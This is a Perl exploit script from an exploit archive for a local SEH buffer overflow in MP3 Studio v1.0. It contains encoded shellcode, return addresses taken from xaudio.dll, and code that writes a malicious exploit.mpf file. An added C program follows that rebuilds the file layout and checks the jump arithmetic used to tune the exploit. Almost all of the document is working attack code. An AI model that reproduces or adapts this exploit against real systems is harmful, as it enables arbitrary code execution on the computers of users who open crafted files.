MP3 Studio v1.0 (mpf File) Local BOF Exploit (SEH)
Source: www.vfcocus.net   Author: Koshi   Published: 2009-07-29

#!/usr/bin/perl
#
# MP3 Studio v1.0 (mpf File) Local BOF Exploit (SEH)
# Exploited by: Koshi
# Download: http://www.software112.com/products/mp3-millennium+download.html
# Based on PoC/findings by HACK4LOVE ( http://milw0rm.com/exploits/9277 )
# Tested on WinXP SP3
#
# I've used addresses from "xaudio.dll", which is shipped with the package.
#
use strict;
use warnings;

# win32_exec -  EXITFUNC=process CMD=calc.exe Size=338 Encoder=Alpha2 http://metasploit.com
my $shellcode =
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49".
"\x49\x49\x49\x49\x48\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x66".
"\x58\x50\x30\x42\x31\x41\x42\x6b\x42\x41\x76\x42\x32\x42\x41\x32".
"\x41\x41\x30\x41\x41\x58\x50\x38\x42\x42\x75\x49\x79\x4b\x4c\x4d".
"\x38\x43\x74\x67\x70\x63\x30\x67\x70\x4c\x4b\x41\x55\x37\x4c\x6c".
"\x4b\x41\x6c\x73\x35\x53\x48\x64\x41\x4a\x4f\x6c\x4b\x70\x4f\x67".
"\x68\x6c\x4b\x41\x4f\x57\x50\x45\x51\x5a\x4b\x53\x79\x4e\x6b\x74".
"\x74\x6c\x4b\x76\x61\x38\x6e\x64\x71\x59\x50\x6e\x79\x4e\x4c\x6b".
"\x34\x79\x50\x63\x44\x73\x37\x4a\x61\x69\x5a\x44\x4d\x76\x61\x6b".
"\x72\x7a\x4b\x4b\x44\x35\x6b\x50\x54\x77\x54\x65\x54\x71\x65\x4d".
"\x35\x6e\x6b\x61\x4f\x64\x64\x65\x51\x7a\x4b\x63\x56\x4c\x4b\x56".
"\x6c\x50\x4b\x4e\x6b\x43\x6f\x47\x6c\x65\x51\x6a\x4b\x6c\x4b\x55".
"\x4c\x6c\x4b\x64\x41\x68\x6b\x6d\x59\x63\x6c\x45\x74\x75\x54\x59".
"\x53\x36\x51\x4b\x70\x71\x74\x6e\x6b\x67\x30\x30\x30\x6f\x75\x6b".
"\x70\x30\x78\x64\x4c\x4c\x4b\x37\x30\x44\x4c\x6e\x6b\x54\x30\x47".
"\x6c\x6e\x4d\x6e\x6b\x53\x58\x75\x58\x6a\x4b\x76\x69\x4e\x6b\x6b".
"\x30\x6c\x70\x37\x70\x47\x70\x35\x50\x4c\x4b\x50\x68\x57\x4c\x51".
"\x4f\x35\x61\x6c\x36\x63\x50\x52\x76\x4f\x79\x6c\x38\x6b\x33\x6f".
"\x30\x31\x6b\x36\x30\x33\x58\x73\x4e\x69\x48\x6b\x52\x44\x33\x55".
"\x38\x6d\x48\x4b\x4e\x4d\x5a\x74\x4e\x50\x57\x4b\x4f\x48\x67\x71".
"\x73\x62\x41\x32\x4c\x45\x33\x56\x4e\x55\x35\x61\x68\x31\x75\x75".
"\x50\x66";

# Pieces that follow the shellcode, in file order: stub, $jmpe, then the
# overwritten SEH record ($nseh = next-SEH pointer, $eseh = handler).
my $jmpe = "\x3f\x5e\x03\x10";   # 0x10035E3F jmp esp (xaudio.dll)
my $nseh = "\xeb\xf1\x90\x90";   # jmp short -15: 9-byte stub + 4-byte $jmpe back, i.e. onto $phun.
                                 # Get back to where we once belong.
my $eseh = "\xfd\x61\x03\x10";   # 0x100361FD jmp edi (xaudio.dll), becomes the SEH handler
my $phun = "\x33\xc0\x33\x45\xf8\x04\x05\xff\xe0";   # stub reached via $nseh
#
# XOR EAX,EAX
# XOR EAX,DWORD PTR SS:[EBP-8]
# ADD AL,5
# JMP EAX
#
# "http:" plus a constant 4103 bytes (padding + shellcode + stub) is what
# places $nseh/$eseh over the SEH record, so the padding shrinks to fit.
my $leng = 4103 - length($shellcode) - length($phun);
my $buff = "\x41" x $leng;
my $tuff = "http:" . $buff . $shellcode . $phun . $jmpe . $nseh . $eseh;

# Write, not append: a second run must not leave two copies in the file.
open(my $fh, '>', 'exploit.mpf') or die "Cannot create exploit.mpf: $!\n";
binmode($fh);
print $fh $tuff;
close($fh);
print "Exploit file has been created. ( exploit.mpf )\n";
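Added example, not part of Koshi's script: the same file image rebuilt in C, returning the file offset of each piece so the SEH-chain arithmetic can be checked offline before touching the target. It confirms that the nSEH short jump (EB F1, displacement -15) lands on the first byte of the $phun stub, that the bytes written over the handler decode to 0x100361FD, and that the image contains no NUL byte (which would cut a strcpy-style copy short). The 338-byte shellcode is replaced by 0xCC stand-in bytes of the same length; SHELLCODE_LEN and PAD_TOTAL are the Size=338 and 4103 values from the script, everything else (g_mpf, build_mpf, short_jmp_target, read_le32, has_nul) is this example's own naming. The checks are on file offsets, not stack addresses.

```c
/* Added example (not Koshi's code): rebuild the .mpf image in the same
 * order as the Perl script's $tuff and verify the SEH layout arithmetic. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define SHELLCODE_LEN 338   /* Size=338 in the script's shellcode comment */
#define PAD_TOTAL     4103  /* bytes between "http:" and $jmpe in the script */
#define MPF_LEN       (5 + PAD_TOTAL + 12)

static const unsigned char JMPE[4] = {0x3f, 0x5e, 0x03, 0x10}; /* 0x10035E3F jmp esp */
static const unsigned char NSEH[4] = {0xeb, 0xf1, 0x90, 0x90}; /* jmp short -15 */
static const unsigned char ESEH[4] = {0xfd, 0x61, 0x03, 0x10}; /* 0x100361FD jmp edi */
static const unsigned char PHUN[9] = {0x33, 0xc0, 0x33, 0x45, 0xf8,
                                      0x04, 0x05, 0xff, 0xe0};  /* xor/xor/add/jmp eax */

struct mpf_layout {               /* file offset of each piece */
    size_t shellcode, stub, jmpe, nseh, eseh, total;
};

static unsigned char g_mpf[MPF_LEN];

/* Concatenate the pieces exactly as the script does. The shellcode is a
 * stand-in of 0xCC (int3) bytes with the real payload's length, so every
 * offset matches the file the Perl script would write. */
static struct mpf_layout build_mpf(void)
{
    struct mpf_layout l;
    size_t pad = PAD_TOTAL - SHELLCODE_LEN - sizeof PHUN;   /* $leng */
    size_t p = 0;

    memcpy(g_mpf + p, "http:", 5);                      p += 5;
    memset(g_mpf + p, 'A', pad);                        p += pad;
    l.shellcode = p;
    memset(g_mpf + p, 0xCC, SHELLCODE_LEN);             p += SHELLCODE_LEN;
    l.stub = p; memcpy(g_mpf + p, PHUN, sizeof PHUN);   p += sizeof PHUN;
    l.jmpe = p; memcpy(g_mpf + p, JMPE, sizeof JMPE);   p += sizeof JMPE;
    l.nseh = p; memcpy(g_mpf + p, NSEH, sizeof NSEH);   p += sizeof NSEH;
    l.eseh = p; memcpy(g_mpf + p, ESEH, sizeof ESEH);   p += sizeof ESEH;
    l.total = p;
    return l;
}

/* Decode a 2-byte short jump (EB rel8) at offset 'at':
 * target = offset of the next instruction + sign-extended rel8.
 * Returns -1 if there is no short jump at that offset. */
static long short_jmp_target(const unsigned char *buf, size_t at)
{
    if (buf[at] != 0xEB)
        return -1;
    return (long)at + 2 + (int8_t)buf[at + 1];
}

/* Read a little-endian 32-bit value, e.g. the address written over the handler. */
static uint32_t read_le32(const unsigned char *buf, size_t at)
{
    return (uint32_t)buf[at] | ((uint32_t)buf[at + 1] << 8) |
           ((uint32_t)buf[at + 2] << 16) | ((uint32_t)buf[at + 3] << 24);
}

/* A NUL anywhere in the image would end a strcpy-style copy of it early. */
static int has_nul(const unsigned char *buf, size_t n)
{
    return memchr(buf, 0, n) != NULL;
}

int main(void)
{
    struct mpf_layout l = build_mpf();

    printf("image %zu bytes: stub at %zu, nSEH at %zu, SEH handler at %zu\n",
           l.total, l.stub, l.nseh, l.eseh);
    printf("nSEH short jump lands at %ld (stub starts at %zu)\n",
           short_jmp_target(g_mpf, l.nseh), l.stub);
    printf("handler = 0x%08x, NUL-free = %s\n",
           (unsigned)read_le32(g_mpf, l.eseh),
           has_nul(g_mpf, l.total) ? "no" : "yes");
    return 0;
}
```

If the jump target and the stub offset ever disagree (for instance after swapping in a stub of a different length), the -15 displacement in $nseh has to change with it; the check above catches that before the file is tried against the application.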